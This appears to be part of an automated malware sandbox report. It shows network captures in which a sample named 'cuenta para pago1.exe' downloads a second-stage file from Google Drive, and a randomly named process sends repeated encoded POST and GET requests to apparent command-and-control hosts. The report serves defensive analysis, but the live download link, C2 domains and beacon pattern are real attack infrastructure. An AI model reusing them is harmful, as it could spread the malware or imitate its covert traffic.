                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 49 72 71 59 66 62 78 54 4a 4e 64 63 45 69 2f 6d 74 78 35 7a 48 76 6f 32 7a 48 50 53 34 6e 2b 54 56 66 4f 7a 42 6a 4a 49 6b 48 4d 70 6a 54 48 31 2f 4e 50 77 4b 49 44 31 77 5a 2f 55 58 57 54 33 57 53 6f 4c 73 66 53 7a 54 43 2b 70 39 63 68 41 7a 76 68 61 54 58 45 55 30 53 48 64 4c 54 76 36 41 48 72 46 6c 6a 45 70 55 53 4b 34 32 63 45 34 61 54 53 2f 64 39 31 43 76 70 6e 30 65 34 31 4e 68 65 58 44 2f 44 51 43 4a 4e 7a 42 32 4d 4d 63 77 64 42 42 2f 68 59 32 4b 47 65 69 65 52 68 47 58 35 77 6d 6a 50 55 34 4e 64 68 72 52 54 52 56 6b 2f 4a 30 33 4b 36 52 4c 48 49 59 72 42 75 79 63 41 3d 3d
                                                                                    Data Ascii: c4qx7JIP=IrqYfbxTJNdcEi/mtx5zHvo2zHPS4n+TVfOzBjJIkHMpjTH1/NPwKID1wZ/UXWT3WSoLsfSzTC+p9chAzvhaTXEU0SHdLTv6AHrFljEpUSK42cE4aTS/d91Cvpn0e41NheXD/DQCJNzB2MMcwdBB/hY2KGeieRhGX5wmjPU4NdhrRTRVk/J03K6RLHIYrBuycA==
                                                                                    Mar 18, 2024 15:10:48.923027992 CET678INHTTP/1.1 307 Temporary Redirect
                                                                                    Date: Mon, 18 Mar 2024 14:10:48 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                    expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                    referer-policy: same-origin
                                                                                    set-cookie: o2s-chl=3740ae8a9502784d81db4ef0b2b153c8; domain=.globalworld-travel.com; expires=Tue, 19-Mar-24 14:10:48 GMT; path=/; SameSite=Lax; HttpOnly
                                                                                    location: http://www.globalworld-travel.com/v3ka/
                                                                                    tiger-protect-security: https://faq.o2switch.fr/hebergement-mutualise/tutoriels-cpanel/tiger-protect
                                                                                    Server: o2switch-PowerBoost-v3
                                                                                    Data Raw: 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 10


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    34192.168.11.3049845109.234.166.81806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:10:51.453597069 CET774OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.globalworld-travel.com
                                                                                    Origin: http://www.globalworld-travel.com
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 225
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.globalworld-travel.com/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 49 72 71 59 66 62 78 54 4a 4e 64 63 46 47 37 6d 76 51 35 7a 4c 66 6f 78 38 6e 50 53 68 33 2b 58 56 66 53 7a 42 69 4e 59 6b 30 6b 70 67 79 58 31 78 73 50 77 4c 49 44 31 6f 4a 2f 56 5a 32 53 37 57 53 55 70 73 62 61 7a 54 42 43 70 39 64 39 41 7a 65 68 46 42 58 45 61 73 69 48 66 57 6a 76 36 41 48 72 46 6c 6a 41 50 55 53 53 34 33 76 4d 34 49 69 53 77 44 4e 31 4e 35 35 6e 30 4a 49 30 6c 68 65 57 55 2f 43 4d 6b 4a 4f 4c 42 32 4f 55 63 77 4d 42 43 31 68 59 4b 41 6d 66 68 59 55 41 51 57 35 49 41 76 59 68 72 4e 4f 52 31 55 45 67 50 35 38 39 32 6b 71 47 38 58 47 6c 77 70 44 76 70 42 43 6d 39 6a 30 4f 4e 59 4d 7a 53 36 79 7a 47 77 50 54 31 4b 7a 41 3d
                                                                                    Data Ascii: c4qx7JIP=IrqYfbxTJNdcFG7mvQ5zLfox8nPSh3+XVfSzBiNYk0kpgyX1xsPwLID1oJ/VZ2S7WSUpsbazTBCp9d9AzehFBXEasiHfWjv6AHrFljAPUSS43vM4IiSwDN1N55n0JI0lheWU/CMkJOLB2OUcwMBC1hYKAmfhYUAQW5IAvYhrNOR1UEgP5892kqG8XGlwpDvpBCm9j0ONYMzS6yzGwPT1KzA=
                                                                                    Mar 18, 2024 15:10:51.627295017 CET678INHTTP/1.1 307 Temporary Redirect
                                                                                    Date: Mon, 18 Mar 2024 14:10:51 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                    expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                    referer-policy: same-origin
                                                                                    set-cookie: o2s-chl=3740ae8a9502784d81db4ef0b2b153c8; domain=.globalworld-travel.com; expires=Tue, 19-Mar-24 14:10:51 GMT; path=/; SameSite=Lax; HttpOnly
                                                                                    location: http://www.globalworld-travel.com/v3ka/
                                                                                    tiger-protect-security: https://faq.o2switch.fr/hebergement-mutualise/tutoriels-cpanel/tiger-protect
                                                                                    Server: o2switch-PowerBoost-v3
                                                                                    Data Raw: 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 10


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    35192.168.11.3049846109.234.166.81806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:10:54.155198097 CET1691OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.globalworld-travel.com
                                                                                    Origin: http://www.globalworld-travel.com
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 1141
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.globalworld-travel.com/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 49 72 71 59 66 62 78 54 4a 4e 64 63 46 47 37 6d 76 51 35 7a 4c 66 6f 78 38 6e 50 53 68 33 2b 58 56 66 53 7a 42 69 4e 59 6b 79 38 70 6a 41 50 31 78 4c 7a 77 61 34 44 31 32 5a 2f 59 5a 32 53 32 57 57 41 74 73 62 58 4f 54 45 47 70 38 2f 5a 41 69 4b 56 46 4c 58 45 61 6c 43 48 65 4c 54 76 56 41 48 37 42 6c 6a 51 50 55 53 53 34 33 75 63 34 59 6a 53 77 42 4e 31 43 76 70 6e 67 65 34 31 49 68 65 2b 45 2f 43 34 53 4a 2f 72 42 33 75 45 63 79 2b 70 43 35 68 59 49 44 6d 66 44 59 55 46 4f 57 34 6b 45 76 59 38 32 4e 4e 42 31 5a 44 42 79 36 64 74 2b 36 6f 33 33 66 58 4a 6e 6c 41 7a 70 4a 42 32 6d 79 32 47 4d 62 2f 7a 39 6a 58 33 5a 68 4d 44 51 4a 30 30 41 53 45 6f 55 6f 31 78 57 4d 56 43 6e 64 70 77 64 33 44 4a 63 64 56 43 68 45 61 76 41 4e 37 65 44 42 37 62 6a 6c 79 57 30 37 45 38 43 76 48 77 73 75 50 41 2f 76 45 79 57 31 79 42 6c 2b 63 49 56 78 73 52 57 53 38 5a 35 4b 2b 54 41 53 4f 6b 79 78 53 59 47 48 39 5a 44 76 53 2b 34 49 58 35 74 35 73 61 52 48 39 56 41 35 52 7a 74 59 45 6b 39 61 4b 57 64 72 4a 72 67 43 44 78 4a 31 4a 58 77 6d 6d 56 63 44 46 72 4d 4c 39 56 36 43 78 69 35 4b 49 78 6e 64 61 4d 74 4b 59 42 2f 56 52 43 63 62 31 35 57 5a 31 66 34 62 46 41 38 4d 42 47 4b 77 48 78 56 72 45 67 6a 61 54 79 35 4f 36 2f 38 66 78 6f 33 56 7a 51 2f 32 4e 62 4f 54 37 58 44 59 75 68 78 65 37 71 53 42 55 55 48 55 75 68 34 58 59 7a 68 61 6c 6b 37 44 74 73 38 37 50 51 41 2b 61 7a 55 34 36 6c 63 59 38 79 59 47 4c 4e 4f 6e 48 6c 41 34 30 31 76 35 6c 44 5a 59 46 77 71 6f 77 6a 46 39 36 66 68 77 51 74 50 56 37 4b 73 51 67 34 5a 78 6f 50 59 4d 4e 78 36 72 76 36 46 63 2f 46 77 6e 59 4c 54 59 4c 71 2b 2b 68 2f 2f 46 33 59 4f 6d 64 4a 57 56 54 33 7a 56 75 6d 57 72 48 2b 6a 47 53 61 35 43 41 7a 71 65 79 6d 63 32 75 34 77 73 45 73 6a 32 76 6b 35 45 57 59 4b 36 6e 67 59 2f 54 75 76 44 68 6b 36 75 54 67 6b 78 79 74 54 66 34 5a 72 6b 32 33 38 58 61 4e 6b 6a 37 56 36 46 67 54 37 33 6d 33 67 59 4c 68 44 77 43 6f 37 6c 48 48 53 55 50 4e 74 70 62 79 49 58 56 39 6f 4a 35 35 33 76 66 46 52 33 50 4f 7a 30 57 78 4f 2f 72 69 62 75 35 38 77 51 64 36 4c 65 64 33 35 42 6b 74 61 52 30 71 69 66 61 6c 53 43 44 7a 37 50 58 51 31 4f 52 4f 66 47 48 46 45 34 6e 39 4c 41 68 53 61 44 35 7a 44 61 58 7a 30 73 6b 38 44 45 59 37 44 58 76 30 72 33 41 58 33 65 73 44 63 2f 79 6b 77 74 45 48 2f 5a 52 59 59 59 51 42 78 78 63 2f 74 72 6b 48 50 72 7a 5a 73 56 64 46 79 5a 47 30 42 56 39 72 51 5a 58 77 4d 39 4d 39 74 4b 45 49 6e 41 54 33 63 72 70 66 37 42 54 71 4e 43 46 75 51 71 62 33 31 59 69 75 56 38 63 66 33 2f 6d 59 6c 6f 4a 32 2b 61 31 38 38 48 49 65 73 2f 75 6e 55 68 4c 4f 76 37 79 72 65 55 54 6d 55 39 50 61 41 38 58 61 31 34 48 2b 59 45 47 6f 39 44 58 36 62 61 5a 65 5a 69 47 61 37 50 63 36 44 78 5a 45 65 33 51 33 31 68 41 64 5a 4e 4c 4b 42 6c 38 54 65 46 52 63 6d 2f 70 73 52 36 38 79 79 4d 5a 47 35 71 74 6d 75 2b 76 39 64 79 44 68 52 46 39 76 70 4f 77 6c 44 2f 6c 55 74 52 78 67 4a 30 46 47 6d 30 67 63 77 6a 53 75 67 58 4b 65 34 6f 47 61 69 47 33 45 42 4b 67 78 78 75 76 46 49 72 73 44 69 32 53 44 56 39 44 7a 4c 2f 55 2f 69 2f 76 70 59 45 6d 5a 77 46 75 58 4a 46 56 7a 45 69 76 35 2f 38 42 5a 55 57 72 38 6b 43 48 44 69 75 42 68 46 4d 4a 5a 30 4a 72 53 5a 41 70 43 49 50 76 6e 36 32 51 37 6d 50 50 4a 6a 2b 34 57 66 59 37 53 6b 48 6d 76 46 74 32 46 71 2f 64 50 39 4a 51 34 62 47 59 32 36 31 5a 72 30 48 67 4b 54 32 5a 79 61 47 2b 6b 77 32 61 34 59 73 37 67 36 55 72 2b 77 33 34 36 2b 37 68 6a 45 49 6a 6e 4d
                                                                                    Data Ascii: c4qx7JIP=IrqYfbxTJNdcFG7mvQ5zLfox8nPSh3+XVfSzBiNYky8pjAP1xLzwa4D12Z/YZ2S2WWAtsbXOTEGp8/ZAiKVFLXEalCHeLTvVAH7BljQPUSS43uc4YjSwBN1Cvpnge41Ihe+E/C4SJ/rB3uEcy+pC5hYIDmfDYUFOW4kEvY82NNB1ZDBy6dt+6o33fXJnlAzpJB2my2GMb/z9jX3ZhMDQJ00ASEoUo1xWMVCndpwd3DJcdVChEavAN7eDB7bjlyW07E8CvHwsuPA/vEyW1yBl+cIVxsRWS8Z5K+TASOkyxSYGH9ZDvS+4IX5t5saRH9VA5RztYEk9aKWdrJrgCDxJ1JXwmmVcDFrML9V6Cxi5KIxndaMtKYB/VRCcb15WZ1f4bFA8MBGKwHxVrEgjaTy5O6/8fxo3VzQ/2NbOT7XDYuhxe7qSBUUHUuh4XYzhalk7Dts87PQA+azU46lcY8yYGLNOnHlA401v5lDZYFwqowjF96fhwQtPV7KsQg4ZxoPYMNx6rv6Fc/FwnYLTYLq++h//F3YOmdJWVT3zVumWrH+jGSa5CAzqeymc2u4wsEsj2vk5EWYK6ngY/TuvDhk6uTgkxytTf4Zrk238XaNkj7V6FgT73m3gYLhDwCo7lHHSUPNtpbyIXV9oJ553vfFR3POz0WxO/ribu58wQd6Led35BktaR0qifalSCDz7PXQ1OROfGHFE4n9LAhSaD5zDaXz0sk8DEY7DXv0r3AX3esDc/ykwtEH/ZRYYYQBxxc/trkHPrzZsVdFyZG0BV9rQZXwM9M9tKEInAT3crpf7BTqNCFuQqb31YiuV8cf3/mYloJ2+a188HIes/unUhLOv7yreUTmU9PaA8Xa14H+YEGo9DX6baZeZiGa7Pc6DxZEe3Q31hAdZNLKBl8TeFRcm/psR68yyMZG5qtmu+v9dyDhRF9vpOwlD/lUtRxgJ0FGm0gcwjSugXKe4oGaiG3EBKgxxuvFIrsDi2SDV9DzL/U/i/vpYEmZwFuXJFVzEiv5/8BZUWr8kCHDiuBhFMJZ0JrSZApCIPvn62Q7mPPJj+4WfY7SkHmvFt2Fq/dP9JQ4bGY261Zr0HgKT2ZyaG+kw2a4Ys7g6Ur+w346+7hjEIjnM
                                                                                    Mar 18, 2024 15:10:54.328897953 CET678INHTTP/1.1 307 Temporary Redirect
                                                                                    Date: Mon, 18 Mar 2024 14:10:54 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                    expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                    referer-policy: same-origin
                                                                                    set-cookie: o2s-chl=3740ae8a9502784d81db4ef0b2b153c8; domain=.globalworld-travel.com; expires=Tue, 19-Mar-24 14:10:54 GMT; path=/; SameSite=Lax; HttpOnly
                                                                                    location: http://www.globalworld-travel.com/v3ka/
                                                                                    tiger-protect-security: https://faq.o2switch.fr/hebergement-mutualise/tutoriels-cpanel/tiger-protect
                                                                                    Server: o2switch-PowerBoost-v3
                                                                                    Data Raw: 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 10


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    36192.168.11.3049847109.234.166.81806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:10:56.860553026 CET468OUTGET /v3ka/?c4qx7JIP=FpC4ctUTedBaFzLAmx5OBNlXlmn8zXWsfuWaCxk5g1trlxnFx7v6dtr2+OePcWisPCE1uISKUROI1tM11v9REV8vlVyrWAjZBU/BkE4yHxOZw90SexyJFP0=&K4W=bb2HuFjPIN HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.globalworld-travel.com
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Mar 18, 2024 15:11:03.898165941 CET492INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Mon, 18 Mar 2024 14:11:03 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                    X-Redirect-By: WordPress
                                                                                    Location: http://globalworld-travel.com/v3ka/?c4qx7JIP=FpC4ctUTedBaFzLAmx5OBNlXlmn8zXWsfuWaCxk5g1trlxnFx7v6dtr2+OePcWisPCE1uISKUROI1tM11v9REV8vlVyrWAjZBU/BkE4yHxOZw90SexyJFP0=&K4W=bb2HuFjPIN
                                                                                    Server: o2switch-PowerBoost-v3


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    37192.168.11.3049852172.67.130.380
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:14:44.917244911 CET721OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.wbyzm5.buzz
                                                                                    Origin: http://www.wbyzm5.buzz
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 205
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.wbyzm5.buzz/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 30 42 36 6b 65 41 38 79 70 4d 56 50 6d 54 35 4e 51 68 35 75 58 37 77 2f 70 49 36 2f 6e 49 43 35 44 78 2f 48 68 58 59 4c 64 77 53 49 52 66 37 47 4f 62 4b 44 45 75 51 55 47 77 70 36 75 38 39 58 6a 53 73 6f 50 64 51 63 36 59 59 71 54 68 30 4d 52 45 74 44 63 71 68 63 66 53 6e 69 58 76 4a 4b 73 38 51 45 67 2f 49 4e 64 75 61 70 30 43 75 62 7a 7a 57 4e 67 49 4b 67 35 2f 52 54 44 61 4e 49 68 47 67 31 47 34 62 4e 4c 53 51 7a 35 48 65 62 2b 64 76 61 45 39 75 77 32 79 56 2b 6f 38 76 37 43 41 50 4a 55 52 4c 74 64 75 50 34 2f 6a 48 37 2f 6f 67 6c 72 2f 72 64 35 6e 47 6b 76 6b 75 44 4a 41 3d 3d
                                                                                    Data Ascii: c4qx7JIP=0B6keA8ypMVPmT5NQh5uX7w/pI6/nIC5Dx/HhXYLdwSIRf7GObKDEuQUGwp6u89XjSsoPdQc6YYqTh0MREtDcqhcfSniXvJKs8QEg/INduap0CubzzWNgIKg5/RTDaNIhGg1G4bNLSQz5Heb+dvaE9uw2yV+o8v7CAPJURLtduP4/jH7/oglr/rd5nGkvkuDJA==
                                                                                    Mar 18, 2024 15:14:45.057276964 CET656INHTTP/1.1 301 Moved Permanently
                                                                                    Date: Mon, 18 Mar 2024 14:14:45 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=3600
                                                                                    Expires: Mon, 18 Mar 2024 15:14:44 GMT
                                                                                    Location: https://www.wbyzm5.buzz/v3ka/
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vDsp9DIZ0qNnx8eHGLSX%2Bcnfxw4BsJS2Jaac1Fdz844Qr4qtSk9rktQONt9jdR%2FsrYQn1VTb5ob2a6nnbe22GaBJdzawXSF9H8jj5hz2PaPCTZTJ8JG7ZHFaLcDvTYAb2Pg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Vary: Accept-Encoding
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8665d4b30abe43bc-EWR
                                                                                    alt-svc: h2=":443"; ma=60
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.11.3049803142.250.65.1744438924C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-03-18 14:06:51 UTC216OUTGET /uc?export=download&id=1TDplZO5f2MIfee6mC03XCNbyFO9KMFyd HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                    Host: drive.google.com
                                                                                    Cache-Control: no-cache
                                                                                    2024-03-18 14:06:51 UTC1582INHTTP/1.1 303 See Other
                                                                                    Content-Type: application/binary
                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                    Date: Mon, 18 Mar 2024 14:06:51 GMT
                                                                                    Location: https://drive.usercontent.google.com/download?id=1TDplZO5f2MIfee6mC03XCNbyFO9KMFyd&export=download
                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                    Content-Security-Policy: script-src 'nonce-Nu0xs6qQoa-KZ3lI09n6cg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                    Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                    Server: ESF
                                                                                    Content-Length: 0
                                                                                    X-XSS-Protection: 0
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.11.3049804142.251.41.14438924C:\Users\user\Desktop\cuenta para pago1.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-03-18 14:06:51 UTC258OUTGET /download?id=1TDplZO5f2MIfee6mC03XCNbyFO9KMFyd&export=download HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                    Cache-Control: no-cache
                                                                                    Host: drive.usercontent.google.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-03-18 14:06:52 UTC4680INHTTP/1.1 200 OK
                                                                                    X-GUploader-UploadID: ABPtcPoseuhZjVTmYh8IWp-2EfNDuIrnKpXEcEt__QJD6-E4lVfioFhmsf-q2KNCVoBdygXlDyw
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Security-Policy: sandbox
                                                                                    Content-Security-Policy: default-src 'none'
                                                                                    Content-Security-Policy: frame-ancestors 'none'
                                                                                    X-Content-Security-Policy: sandbox
                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                                    Cross-Origin-Resource-Policy: same-site
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Content-Disposition: attachment; filename="OJZITJt84.bin"
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Credentials: false
                                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
                                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 273984
                                                                                    Last-Modified: Tue, 12 Mar 2024 11:43:36 GMT
                                                                                    Date: Mon, 18 Mar 2024 14:06:52 GMT
                                                                                    Expires: Mon, 18 Mar 2024 14:06:52 GMT
                                                                                    Cache-Control: private, max-age=0
                                                                                    X-Goog-Hash: crc32c=YYTtyQ==
                                                                                    Server: UploadServer
                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                    Connection: close
